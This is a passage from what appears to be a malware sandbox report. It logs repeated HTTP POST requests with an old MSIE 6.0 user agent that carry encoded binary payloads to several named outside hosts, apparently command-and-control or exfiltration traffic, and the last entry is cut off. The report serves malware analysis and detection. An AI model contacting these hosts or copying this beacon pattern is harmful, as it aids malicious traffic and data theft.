6b 76 6d 41 6f 68 58 4c 62 44 6e 71 55 48 4b 2f 46 63 4f 78 38 42 47 35 4f 72 64 32 41 61 43 78 72 47 6a 57 4d 31 73 51 59 37 7a 57 43 33 43 2f 42 5a 46 63 4d 79 75 67 67 43 6b 48 31 46 71 54 6d 58 74 6d 33 74 52 31 64 63 66 6f 32 2b 58 6b 58 49 35 68 7a 4f 53 51 4f 4c 53 51 62 74 53 6f 49 64 4e 31 52 73 76 45 43 73 7a 77 72 39 5a 57 2f 72 35 6f 33 34 2b 6e 59 70 59 32 71 57 54 73 4a 2b 4a 31 6e 42 69 70 42 59 75 61 6b 67 75 52 75 31 79 6d 43 5a 71 57 48 67 58 38 4e 42 33 41 75 67 4c 37 2b 64 71 65 7a 49 63 77 56 64 2b 6c 75 34 75 42 68 44 43 59 31 48 51 37 44 4e 63 4e 4c 7a 34 6c 65 70 56 61 35 41 34 35 2f 6e 31 75 33 6a 6f 65 37 37 34 63 58 43 4a 45 6d 4d 2f 61 6b 47 56 37 66 43 68 41 52 48 66 33 42 2b 77 56 6c 6e 79 47 6d 74 36 46 77 64 45 75 57 71 6b 56 47 46 33 57 4e 68 62 39 46 48 79 6a 2b 6f 69 55 54 4e 31 36 4a 32 6f 6a 49 53 47 55 6c 51 50 74 45 42 42 4a 59 75 76 69 6f 63 35 2f 4e 68 59 2f 50 64 33 57 2f 78 6d 71 41 3d 3d Data Ascii: Rg2fln2uLvzxT8l4NJ2IrrZHLu+rD26gAVfxfv9xpYAdEw9sFet7V3H/xHIFnlKtbMgU67rJcA60xr0pOxNBaNPidv/i6JPvNp3BRJihZJtt/ZLP2DWCNpNRvX4unjF23Z8mZPWdCdfVz/18NOCm1H91iYL9xhw0/7ndMbgVJuX42phouNAXyNIrijr8qKOZ3Rh1YKkHatASRXiw9vADZGTO+Ux3gr+ofFMDtkvmAohXLbDnqUHK/FcOx8BG5Ord2AaCxrGjWM1sQY7zWC3C/BZFcMyuggCkH1FqTmXtm3tR1dcfo2+XkXI5hzOSQOLSQbtSoIdN1RsvECszwr9ZW/r5o34+nYpY2qWTsJ+J1nBipBYuakguRu1ymCZqWHgX8NB3AugL7+dqezIcwVd+lu4uBhDCY1HQ7DNcNLz4lepVa5A45/n1u3joe774cXCJEmM/akGV7fChARHf3B+wVlnyGmt6FwdEuWqkVGF3WNhb9FHyj+oiUTN16J2ojISGUlQPtEBBJYuvioc5/NhY/Pd3W/xmqA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.2print.comCache-Control: no-cacheData Raw: 32 7a 43 42 50 65 5a 74 77 66 78 4b 74 70 73 37 67 53 79 42 33 77 6c 63 30 46 72 47 67 55 49 4e 65 72 68 70 5a 73 2b 7a 6c 79 32 4b 78 7a 4c 68 75 7a 44 50 34 79 63 54 61 53 6a 61 37 79 51 4a 73 4b 4e 6e 65 68 6d 63 48 76 76 6e 76 2b 53 65 61 6a 6d 71 49 34 76 43 50 37 4b 47 61 59 2f 69 34 35 61 58 71 42 46 2b 64 61 6d 2f 65 41 58 4b 55 5a 33 47 51 74 66 4d 76 58 4e 5a 66 6c 6c 62 78 4d 35 50 4b 4a 73 63 2f 35 41 72 32 6a 38 2f 34 70 65 6a 6f 69 69 6f 4e 4b 7a 72 54 6c 2f 6b 4a 36 32 77 52 6e 50 33 38 44 54 55 7a 6e 59 59 62 75 37 30 56 70 49 41 6d 76 61 48 74 33 7a 4f 6a 6d 45 6f 7a 56 6f 7a 77 50 6a 50 37 43 70 44 36 46 59 47 34 61 56 61 63 74 45 63 38 6b 58 77 75 63 4b 57 48 6c 74 4e 4b 75 49 41 65 36 75 35 34 31 75 46 57 42 41 73 4a 7a 47 30 4f 79 32 6e 41 44 55 39 2f 36 38 4d 64 4d 69 6e 39 44 5a 45 6c 55 4d 48 30 2f 74 2b 72 2f 45 66 64 66 67 70 2f 4b 32 41 32 53 71 43 65 58 61 65 46 53 75 30 68 37 78 30 63 73 37 67 30 68 32 70 4b 61 31 52 39 49 51 45 38 72 76 4f 37 61 4d 74 53 78 4e 75 6b 74 6e 71 67 75 53 6d 67 73 72 56 41 74 4a 47 64 64 63 46 64 54 4c 4d 2b 67 76 54 70 67 7a 72 63 34 76 4f 34 74 4b 47 6a 39 77 6c 2f 48 58 74 50 36 30 49 6e 50 66 70 31 35 74 5a 54 65 61 33 46 4e 4e 6b 69 6d 44 59 68 5a 58 39 41 7a 43 62 2f 6c 6d 58 62 6e 53 41 4c 61 57 73 2b 70 37 75 41 31 43 67 55 44 75 39 4d 30 65 51 61 4c 65 48 73 4c 64 79 71 58 68 48 4f 33 5a 52 38 6b 61 45 38 32 31 49 35 67 69 38 6f 39 48 79 66 6a 4e 79 4a 54 76 64 52 47 36 38 71 30 32 50 38 7a 6e 41 2f 75 6c 78 6d 6d 6a 4d 51 62 55 63 7a 58 6a 52 69 79 56 35 46 38 6c 72 6f 39 59 4c 42 55 41 6d 57 61 49 65 4f 6d 37 57 50 51 42 44 35 67 47 58 66 61 48 56 6b 6f 4a 74 51 78 46 61 4a 34 51 3d Data Ascii: 2zCBPeZtwfxKtps7gSyB3wlc0FrGgUINerhpZs+zly2KxzLhuzDP4ycTaSja7yQJsKNnehmcHvvnv+SeajmqI4vCP7KGaY/i45aXqBF+dam/eAXKUZ3GQtfMvXNZfllbxM5PKJsc/5Ar2j8/4pejoiioNKzrTl/kJ62wRnP38DTUznYYbu70VpIAmvaHt3zOjmEozVozwPjP7CpD6FYG4aVactEc8kXwucKWHltNKuIAe6u541uFWBAsJzG0Oy2nADU9/68MdMin9DZElUMH0/t+r/Efdfgp/K2A2SqCeXaeFSu0h7x0cs7g0h2pKa1R9IQE8rvO7aMtSxNuktnqguSmgsrVAtJGddcFdTLM+gvTpgzrc4vO4tKGj9wl/HXtP60InPfp15tZTea3FNNkimDYhZX9AzCb/lmXbnSALaWs+p7uA1CgUDu9M0eQaLeHsLdyqXhHO3ZR8kaE821I5gi8o9HyfjNyJTvdRG68q02P8znA/ulxmmjMQbUczXjRiyV5F8lro9YLBUAmWaIeOm7WPQBD5gGXfaHVkoJtQxFaJ4Q=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 32 68 74 2f 71 73 4b 6e 76 50 77 55 55 39 51 6e 74 63 54 4d 6e 6b 57 69 6c 41 7a 53 52 6e 71 2b 46 73 4c 6d 4b 59 79 63 43 4c 4d 77 4b 53 76 37 69 50 42 6b 46 5a 78 54 57 2f 79 64 6a 2b 71 79 66 4d 41 4d 42 45 62 63 65 36 5a 6a 52 6d 4a 4d 39 70 63 45 36 50 4b 4e 79 69 56 6d 58 32 49 65 51 6a 74 78 52 4e 42 64 38 6c 56 76 2f 7a 30 6e 6e 72 58 6a 4f 76 30 30 62 61 4a 46 33 48 36 51 35 42 44 4c 74 73 65 4c 35 68 62 43 37 35 64 47 65 7a 4b 70 33 61 36 6a 63 31 73 50 75 76 79 4a 76 4e 6a 59 4e 39 4f 36 56 57 48 38 58 6b 44 7a 6b 47 4f 6c 42 57 41 54 45 30 64 6f 56 57 7a 39 4a 4e 70 55 46 41 77 73 49 7a 32 76 44 6d 4b 77 74 79 45 73 77 6a 31 38 54 36 45 6a 67 75 76 30 66 57 53 6f 79 61 75 5a 62 77 2b 54 58 4e 41 43 38 6d 36 77 61 58 5a 77 70 6c 62 53 42 35 62 64 30 62 41 62 64 68 70 33 56 45 43 59 51 59 53 38 69 41 50 4d 32 59 53 33 41 32 36 70 32 4d 47 48 6e 4a 73 47 49 31 53 4b 45 43 2b 4c 47 70 65 4b 77 67 61 4c 76 57 32 64 4c 6f 5a 64 77 6e 58 4a 63 5a 50 6f 56 34 52 55 6a 6b 71 72 6e 4b 34 6d 36 54 34 59 45 36 39 4e 77 4b 51 63 75 47 4f 38 42 34 36 58 47 51 69 75 31 44 33 45 74 6f 6e 47 73 4c 61 45 6e 37 46 39 34 32 55 36 79 4a 34 6d 6b 52 56 47 64 33 49 6f 4e 69 6d 74 6b 76 2f 49 76 48 48 45 56 57 75 54 64 51 30 57 64 5a 32 51 71 68 33 35 6e 35 2b 64 62 78 64 33 72 57 77 4d 52 4c 59 49 62 44 42 76 65 6b 73 42 4f 33 52 46 42 31 70 78 4f 50 79 34 70 37 55 53 6d 63 79 5a 6d 69 50 5a 6f 2b 4d 44 41 67 4e 64 79 54 53 4d 68 59 54 69 41 74 7a 59 50 78 39 35 2b 72 6e 66 31 67 6a 35 2f 37 73 38 56 73 47 78 48 68 30 41 73 6b 6d 2f 58 58 68 68 79 78 70 48 34 71 44 6b 72 75 71 47 4b 58 41 78 6b 49 55 5a 74 4c 33 66 77 47 39 52 42 65 34 45 75 6b 66 67 69 64 37 2f 2b 6d 30 67 59 64 75 5a 41 30 58 39 41 6c 30 42 42 6e 6d 47 2f 63 58 2f 46 61 61 71 79 2b 4a 6c 7a 68 75 67 Data Ascii: 2ht/qsKnvPwUU9QntcTMnkWilAzSRnq+FsLmKYycCLMwKSv7iPBkFZxTW/ydj+qyfMAMBEbce6ZjRmJM9pcE6PKNyiVmX2IeQjtxRNBd8lVv/z0nnrXjOv00baJF3H6Q5BDLtseL5hbC75dGezKp3a6jc1sPuvyJvNjYN9O6VWH8XkDzkGOlBWATE0doVWz9JNpUFAwsIz2vDmKwtyEswj18T6Ejguv0fWSoyauZbw+TXNAC8m6waXZwplbSB5bd0bAbdhp3VECYQYS8iAPM2YS3A26p2MGHnJsGI1SKEC+LGpeKwgaLvW2dLoZdwnXJcZPoV4RUjkqrnK4m6T4YE69NwKQcuGO8B46XGQiu1D3EtonGsLaEn7F942U6yJ4mkRVGd3IoNimtkv/IvHHEVWuTdQ0WdZ2Qqh35n5+dbxd3rWwMRLYIbDBveksBO3RFB1pxOPy4p7USmcyZmiPZo+MDAgNdyTSMhYTiAtzYPx95+rnf1gj5/7s8VsGxHh0Askm/XXhhyxpH4qDkruqGKXAxkIUZtL3fwG9RBe4Eukfgid7/+m0gYduZA0X9Al0BBnmG/cX/Faaqy+Jlzhug
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 34 70 61 5a 4b 4a 38 66 73 50 78 36 43 5a 74 49 2f 75 69 41 56 43 67 76 75 70 5a 31 2f 4f 4a 36 51 78 46 71 51 4b 48 77 58 4c 76 2b 4d 4e 76 4c 48 6b 6d 6d 30 41 37 43 6f 42 45 4c 4d 39 68 4b 49 30 62 4e 67 53 6c 42 42 79 57 31 73 33 6a 58 53 48 54 63 62 30 45 77 79 6b 68 31 77 4b 41 2f 36 5a 6e 51 50 78 69 6f 4c 6b 45 4f 6f 71 58 46 65 34 71 41 6a 41 43 68 68 46 6e 78 44 38 79 5a 2f 4c 36 53 72 37 6b 79 61 43 53 68 77 6e 6b 43 63 55 33 61 4e 69 61 4e 54 47 32 71 39 45 33 2b 57 39 64 74 4c 45 41 71 63 6b 59 4a 39 2b 4c 44 41 75 64 43 6a 33 58 43 54 62 5a 61 4f 47 71 5a 36 6c 53 4c 2b 44 38 63 72 39 67 6a 4b 58 4f 6e 43 33 5a 50 41 77 6f 39 50 30 4e 74 53 68 45 36 69 41 4e 74 62 2b 77 4f 2b 67 6e 46 2b 4c 36 58 66 36 78 2f 72 32 4b 7a 44 4f 42 69 44 54 67 67 2b 5a 6e 6e 4b 6b 35 61 72 59 33 68 30 64 70 41 76 55 76 36 6c 67 53 53 6d 38 37 73 59 30 35 66 64 6e 65 49 75 71 7a 52 6e 37 77 76 46 62 70 4e 4a 6b 70 54 34 44 75 50 69 76 67 4f 6d 4a 4a 4f 6c 56 77 62 57 4d 45 34 33 2b 5a 2f 62 55 39 62 6c 5a 5a 38 6e 50 79 63 67 68 42 59 59 42 55 33 38 6c 33 31 59 44 79 67 64 4b 4b 7a 37 53 61 57 64 30 48 34 6d 7a 63 6a 6e 44 74 76 4e 30 2b 4c 63 37 48 62 66 30 66 6d 4c 78 4f 63 43 49 53 48 4a 30 71 48 65 36 76 47 4c 46 79 34 79 44 4b 5a 32 36 4e 50 4f 4f 4d 45 63 41 50 6d 65 68 51 44 66 75 70 59 6f 56 7a 52 46 4e 45 61 34 70 51 38 53 69 36 45 69 4c 51 75 50 33 4f 46 65 66 73 47 79 57 43 6d 70 33 36 6c 45 5a 67 5a 46 50 31 4b 78 4e 42 57 39 62 71 78 4d 68 6a 70 55 70 4b 4c 58 6e 4d 52 62 57 59 51 56 36 42 74 4b 39 32 4f 73 38 38 38 30 4f 38 39 55 4e 4c 70 2b 65 49 57 4b 7a 30 41 79 31 56 79 57 6f 58 46 64 61 57 71 34 6a 30 3d Data Ascii: 4paZKJ8fsPx6CZtI/uiAVCgvupZ1/OJ6QxFqQKHwXLv+MNvLHkmm0A7CoBELM9hKI0bNgSlBByW1s3jXSHTcb0Ewykh1wKA/6ZnQPxioLkEOoqXFe4qAjAChhFnxD8yZ/L6Sr7kyaCShwnkCcU3aNiaNTG2q9E3+W9dtLEAqckYJ9+LDAudCj3XCTbZaOGqZ6lSL+D8cr9gjKXOnC3ZPAwo9P0NtShE6iANtb+wO+gnF+L6Xf6x/r2KzDOBiDTgg+ZnnKk5arY3h0dpAvUv6lgSSm87sY05fdneIuqzRn7wvFbpNJkpT4DuPivgOmJJOlVwbWME43+Z/bU9blZZ8nPycghBYYBU38l31YDygdKKz7SaWd0H4mzcjnDtvN0+Lc7Hbf0fmLxOcCISHJ0qHe6vGLFy4yDKZ26NPOOMEcAPmehQDfupYoVzRFNEa4pQ8Si6EiLQuP3OFefsGyWCmp36lEZgZFP1KxNBW9bqxMhjpUpKLXnMRbWYQV6BtK92Os8880O89UNLp+eIWKz0Ay1VyWoXFdaWq4j0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 76 34 39 50 7a 78 49 71 78 76 7a 67 71 68 70 52 78 55 49 45 49 78 56 6c 4d 43 39 69 54 2b 72 37 5a 73 47 76 4b 31 54 76 51 35 74 57 64 4b 2f 2b 43 42 72 31 49 79 6e 38 72 53 72 4c 47 77 4e 6c 72 76 30 71 34 58 7a 34 51 35 39 4a 57 57 55 54 65 76 6e 2f 62 37 6b 6b 61 4c 58 34 32 30 72 4b 54 79 73 42 4f 62 6c 72 5a 35 56 33 66 65 6c 79 38 45 30 45 74 2b 51 57 59 30 6e 6e 39 30 35 44 58 46 69 59 52 46 6b 2f 5a 62 66 4d 6c 74 48 75 4c 4a 72 37 51 4f 76 59 4c 31 62 75 55 72 61 70 79 49 36 38 2f 41 48 36 65 53 79 4e 61 64 6d 39 4a 4b 50 64 6d 2f 76 64 43 76 46 59 65 37 4e 2f 50 34 70 5a 2b 6a 68 55 6c 4f 64 54 6e 32 31 43 75 73 36 4f 54 4b 30 7a 37 64 6f 76 55 35 50 6a 48 71 55 62 55 73 75 6d 73 4c 4c 5a 64 4e 69 33 63 5a 68 4a 30 66 31 74 73 6a 79 63 39 6c 53 6c 75 6d 75 6a 71 2f 55 59 53 77 41 48 34 64 51 72 63 50 57 6c 56 30 48 79 71 48 58 6b 6c 4a 4e 74 45 4c 4e 63 70 4e 67 6e 54 70 4f 62 45 66 41 33 5a 74 4e 6a 6f 69 6b 36 4a 4b 63 35 48 73 4d 36 66 44 48 74 33 4b 31 51 36 63 67 43 7a 6d 52 31 68 74 30 73 43 5a 46 59 5a 47 66 43 64 34 35 58 48 75 64 57 45 45 47 41 55 4c 32 65 69 77 36 2f 50 31 2b 34 57 31 53 64 50 63 56 49 39 54 62 55 4d 6b 53 67 53 76 72 4c 6e 58 50 4d 63 47 41 71 46 7a 30 65 7a 30 6a 6d 31 33 6c 7a 63 71 39 39 78 76 45 4d 2b 41 38 72 75 7a 4c 62 30 78 50 32 4c 64 47 69 63 45 42 52 6b 35 6f 66 57 48 55 77 51 6c 79 75 67 59 75 71 2b 35 39 78 51 70 6a 59 79 4b 4f 51 4f 77 76 77 57 59 4e 77 41 65 33 55 61 44 59 4f 6f 79 63 74 68 78 77 6b 78 56 4b 52 66 33 5a 6d 73 48 45 50 4a 58 36 4f 55 72 55 63 39 4b 38 34 6c 6e 71 73 33 77 67 36 6b 67 30 31 56 67 75 76 76 4d 6b 32 31 7a 68 66 2f 69 35 75 76 2b 41 39 78 53 44 38 6a 55 72 2f 4c 42 71 56 64 44 70 78 52 77 3d 3d Data Ascii: v49PzxIqxvzgqhpRxUIEIxVlMC9iT+r7ZsGvK1TvQ5tWdK/+CBr1Iyn8rSrLGwNlrv0q4Xz4Q59JWWUTevn/b7kkaLX420rKTysBOblrZ5V3fely8E0Et+QWY0nn905DXFiYRFk/ZbfMltHuLJr7QOvYL1buUrapyI68/AH6eSyNadm9JKPdm/vdCvFYe7N/P4pZ+jhUlOdTn21Cus6OTK0z7dovU5PjHqUbUsumsLLZdNi3cZhJ0f1tsjyc9lSlumujq/UYSwAH4dQrcPWlV0HyqHXklJNtELNcpNgnTpObEfA3ZtNjoik6JKc5HsM6fDHt3K1Q6cgCzmR1ht0sCZFYZGfCd45XHudWEEGAUL2eiw6/P1+4W1SdPcVI9TbUMkSgSvrLnXPMcGAqFz0ez0jm13lzcq99xvEM+A8ruzLb0xP2LdGicEBRk5ofWHUwQlyugYuq+59xQpjYyKOQOwvwWYNwAe3UaDYOoycthxwkxVKRf3ZmsHEPJX6OUrUc9K84lnqs3wg6kg01VguvvMk21zhf/i5uv+A9xSD8jUr/LBqVdDpxRw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 32 68 74 2f 71 73 4b 6e 76 50 77 55 55 39 51 6e 74 63 54 4d 6e 6b 57 69 6c 41 7a 53 52 6e 71 2b 46 73 4c 6d 4b 59 79 63 43 4c 4d 77 4b 53 76 37 69 50 42 6b 46 5a 78 54 57 2f 79 64 6a 2b 71 79 66 4d 41 4d 42 45 62 63 65 36 5a 6a 52 6d 4a 4d 39 70 63 45 36 50 4b 4e 79 69 56 6d 58 32 49 65 51 6a 74 78 52 4e 42 64 38 6c 56 76 2f 7a 30 6e 6e 72 58 6a 4f 76 30 30 62 61 4a 46 33 48 36 51 35 42 44 4c 74 73 65 4c 35 68 62 43 37 35 64 47 65 7a 4b 70 33 61 36 6a 63 31 73 50 75 76 79 4a 76 4e 6a 59 4e 39 4f 36 56 57 48 38 58 6b 44 7a 6b 47 4f 6c 42 57 41 54 45 30 64 6f 56 57 7a 39 4a 4e 70 55 46 41 77 73 49 7a 32 76 44 6d 4b 77 74 79 45 73 77 6a 31 38 54 36 45 6a 67 75 76 30 66 57 53 6f 79 61 75 5a 62 77 2b 54 58 4e 41 43 38 6d 36 77 61 58 5a 77 70 6c 62 53 42 35 62 64 30 62 41 62 64 68 70 33 56 45 43 59 51 59 53 38 69 41 50 4d 32 59 53 33 41 32 36 70 32 4d 47 48 6e 4a 73 47 49 31 53 4b 45 43 2b 4c 47 70 65 4b 77 67 61 4c 76 57 32 64 4c 6f 5a 64 77 6e 58 4a 63 5a 50 6f 56 34 52 55 6a 6b 71 72 6e 4b 34 6d 36 54 34 59 45 36 39 4e 77 4b 51 63 75 47 4f 38 42 34 36 58 47 51 69 75 31 44 33 45 74 6f 6e 47 73 4c 61 45 6e 37 46 39 34 32 55 36 79 4a 34 6d 6b 52 56 47 64 33 49 6f 4e 69 6d 74 6b 76 2f 49 76 48 48 45 56 57 75 54 64 51 30 57 64 5a 32 51 71 68 33 35 6e 35 2b 64 62 78 64 33 72 57 77 4d 52 4c 59 49 62 44 42 76 65 6b 73 42 4f 33 52 46 42 31 70 78 4f 50 79 34 70 37 55 53 6d 63 79 5a 6d 69 50 5a 6f 2b 4d 44 41 67 4e 64 79 54 53 4d 68 59 54 69 41 74 7a 59 50 78 39 35 2b 72 6e 66 31 67 6a 35 2f 37 73 38 56 73 47 78 48 68 30 41 73 6b 6d 2f 58 58 68 68 79 78 70 48 34 71 44 6b 72 75 71 47 4b 58 41 78 6b 49 55 5a 74 4c 33 66 77 47 39 52 42 65 34 45 75 6b 66 67 69 64 37 2f 2b 6d 30 67 59 64 75 5a 41 30 58 39 41 6c 30 42 42 6e 6d 47 2f 63 58 2f 46 61 61 71 79 2b 4a 6c 7a 68 75 67 Data Ascii: 2ht/qsKnvPwUU9QntcTMnkWilAzSRnq+FsLmKYycCLMwKSv7iPBkFZxTW/ydj+qyfMAMBEbce6ZjRmJM9pcE6PKNyiVmX2IeQjtxRNBd8lVv/z0nnrXjOv00baJF3H6Q5BDLtseL5hbC75dGezKp3a6jc1sPuvyJvNjYN9O6VWH8XkDzkGOlBWATE0doVWz9JNpUFAwsIz2vDmKwtyEswj18T6Ejguv0fWSoyauZbw+TXNAC8m6waXZwplbSB5bd0bAbdhp3VECYQYS8iAPM2YS3A26p2MGHnJsGI1SKEC+LGpeKwgaLvW2dLoZdwnXJcZPoV4RUjkqrnK4m6T4YE69NwKQcuGO8B46XGQiu1D3EtonGsLaEn7F942U6yJ4mkRVGd3IoNimtkv/IvHHEVWuTdQ0WdZ2Qqh35n5+dbxd3rWwMRLYIbDBveksBO3RFB1pxOPy4p7USmcyZmiPZo+MDAgNdyTSMhYTiAtzYPx95+rnf1gj5/7s8VsGxHh0Askm/XXhhyxpH4qDkruqGKXAxkIUZtL3fwG9RBe4Eukfgid7/+m0gYduZA0X9Al0BBnmG/cX/Faaqy+Jlzhug
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 67 36 35 67 47 70 49 36 32 66 77 75 67 2f 39 41 52 52 67 50 57 5a 56 4a 74 44 48 69 71 53 66 36 35 70 6e 66 74 76 4b 49 64 33 4b 6a 62 7a 5a 7a 58 4d 4e 45 63 48 30 6d 47 59 31 71 4d 4d 56 78 53 5a 44 55 34 79 6d 30 47 63 56 55 70 48 71 6f 66 6e 63 65 79 61 46 48 2b 5a 6f 47 33 32 34 30 78 55 43 6a 32 52 37 6b 76 77 6d 34 61 68 7a 30 43 56 51 65 51 4b 70 64 6a 6a 6b 36 33 64 43 54 65 36 43 65 71 69 6f 6e 68 37 34 62 50 30 38 6e 4b 2f 44 4c 6c 6e 6d 4f 50 62 39 39 51 4f 55 4e 6a 76 6f 4b 7a 38 77 41 76 30 52 73 4e 41 56 39 50 51 48 32 56 48 50 46 41 42 76 57 61 61 50 54 38 65 42 31 58 42 68 51 77 36 46 61 52 54 39 4b 35 31 42 53 75 76 70 54 42 2f 59 72 34 48 36 47 37 4e 61 68 69 68 72 36 6c 69 41 73 38 39 49 70 73 39 6c 73 4a 50 38 69 38 73 39 31 2f 53 7a 4e 53 30 59 2f 31 56 75 42 6d 45 33 74 56 4b 68 6f 32 37 6c 36 66 69 45 71 51 41 32 76 62 35 61 6d 47 33 4a 6d 4f 62 72 74 6f 54 71 46 58 64 42 33 31 6d 67 70 59 4b 6f 56 34 43 56 73 4c 48 72 49 33 39 75 7a 6e 6f 43 32 36 2f 4e 74 44 45 41 59 39 6f 52 37 76 4e 59 52 6a 4f 65 44 48 46 59 73 53 2b 71 4a 49 42 47 6c 56 4a 74 79 43 61 69 51 39 61 45 57 56 34 32 49 54 52 30 57 4b 2b 55 51 43 4e 6b 6f 39 76 55 63 38 48 2b 6c 76 47 45 48 47 74 77 36 61 6e 43 4b 36 2f 6d 74 33 74 4e 30 78 58 6a 6e 4d 47 47 35 57 65 70 48 57 6e 7a 54 35 6b 37 7a 55 73 51 7a 67 61 2b 46 77 4f 6e 54 4f 63 35 43 58 62 4d 6e 51 49 38 74 52 59 5a 63 52 6c 49 4b 53 76 39 77 4a 75 79 43 30 75 2f 55 73 74 7a 48 33 59 6c 52 31 50 43 61 71 36 4f 6f 43 31 36 49 55 68 61 36 64 5a 42 73 71 59 36 6f 32 64 4e 72 4a 5a 76 47 48 64 35 6f 56 71 5a 6e 6e 4a 50 49 34 44 2b 62 37 5a 75 34 59 4f 47 53 56 31 46 4b 51 67 6e 56 76 61 6b 44 46 2f 36 2b 7a 55 77 49 55 4d 42 2f 72 61 6c 47 44 59 44 79 39 48 31 30 70 63 31 44 34 4e 39 6d 4e 41 30 47 2b 42 44 45 4d 49 48 4e 4e 36 76 4b Data Ascii: g65gGpI62fwug/9ARRgPWZVJtDHiqSf65pnftvKId3KjbzZzXMNEcH0mGY1qMMVxSZDU4ym0GcVUpHqofnceyaFH+ZoG3240xUCj2R7kvwm4ahz0CVQeQKpdjjk63dCTe6Ceqionh74bP08nK/DLlnmOPb99QOUNjvoKz8wAv0RsNAV9PQH2VHPFABvWaaPT8eB1XBhQw6FaRT9K51BSuvpTB/Yr4H6G7Nahihr6liAs89Ips9lsJP8i8s91/SzNS0Y/1VuBmE3tVKho27l6fiEqQA2vb5amG3JmObrtoTqFXdB31mgpYKoV4CVsLHrI39uznoC26/NtDEAY9oR7vNYRjOeDHFYsS+qJIBGlVJtyCaiQ9aEWV42ITR0WK+UQCNko9vUc8H+lvGEHGtw6anCK6/mt3tN0xXjnMGG5WepHWnzT5k7zUsQzga+FwOnTOc5CXbMnQI8tRYZcRlIKSv9wJuyC0u/UstzH3YlR1PCaq6OoC16IUha6dZBsqY6o2dNrJZvGHd5oVqZnnJPI4D+b7Zu4YOGSV1FKQgnVvakDF/6+zUwIUMB/ralGDYDy9H10pc1D4N9mNA0G+BDEMIHNN6vK
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.x0c.comCache-Control: no-cacheData Raw: 70 49 39 30 2b 4e 64 77 34 50 79 72 79 6f 59 30 78 6c 6a 4a 68 53 44 70 44 2b 41 4e 59 69 62 72 2b 35 6d 4b 55 50 71 66 2f 39 42 6e 4d 62 64 34 63 56 62 4a 43 44 51 4e 76 32 6a 38 34 67 4c 66 4d 6b 4c 56 4b 63 56 66 54 79 70 6c 37 31 59 36 39 48 70 51 43 45 4b 6b 4b 70 41 48 57 62 70 69 51 41 67 79 49 31 59 75 44 67 72 66 55 65 62 6c 50 4e 4e 79 56 56 4c 4a 47 4c 55 43 36 31 76 48 70 4d 56 75 71 44 42 6e 73 70 77 77 46 43 32 44 77 50 32 56 50 5a 36 47 6d 66 4d 6f 31 4f 4a 37 6a 39 77 34 59 6a 52 50 5a 57 62 2b 75 51 2f 4c 68 33 51 7a 53 41 63 38 43 37 6f 70 69 51 5a 44 49 50 50 54 33 6b 75 32 31 71 74 71 47 38 58 71 36 75 72 70 74 4c 44 46 4b 5a 66 35 33 36 70 75 54 53 76 7a 63 65 44 33 68 67 30 69 6d 74 5a 75 49 38 47 49 67 58 39 32 4b 6d 57 50 75 6b 49 56 6e 47 52 61 42 4f 62 67 44 49 57 67 42 46 74 31 5a 45 6d 77 51 35 42 4b 46 33 4f 76 56 65 4e 72 2b 39 52 68 42 71 35 4b 79 54 66 56 58 2f 4d 67 72 39 78 34 66 2f 6f 50 77 38 65 6a 6d 36 61 4b 76 6d 34 35 77 2b 51 31 75 31 6b 54 76 62 77 65 65 46 35 5a 56 6a 34 6e 69 63 41 30 4d 71 65 64 36 35 2f 67 61 48 76 66 45 48 4b 67 4c 6b 4c 7a 6a 7a 53 57 69 57 5a 5a 41 51 2b 4b 72 46 38 70 7a 55 2f 46 49 73 45 69 72 35 6e 41 6a 69 79 42 30 45 64 63 78 47 33 78 4f 42 64 36 51 78 44 6f 63 6a 4e 31 4e 4a 43 30 41 6f 68 47 4d 74 38 6c 6f 53 43 37 73 35 58 58 44 46 34 2b 4e 38 71 66 76 41 72 5a 4f 2f 38 64 56 46 45 30 51 44 48 74 42 76 45 41 5a 45 78 71 6d 4d 66 59 57 34 42 75 74 31 46 70 6a 6f 77 32 4e 4f 68 77 34 4b 49 31 63 62 30 4e 58 32 47 47 65 35 35 48 43 78 46 62 4d 59 33 49 34 54 30 5a 69 66 65 2f 69 42 64 78 63 75 52 39 41 39 6d 50 70 48 67 75 6e 32 72 6f 42 55 43 31 37 37 38 75 74 4a 65 6c 35 37 61 4a 37 6d 36 36 76 4b 6f 78 4b 2b 74 61 7a 77 3d 3d Data Ascii: 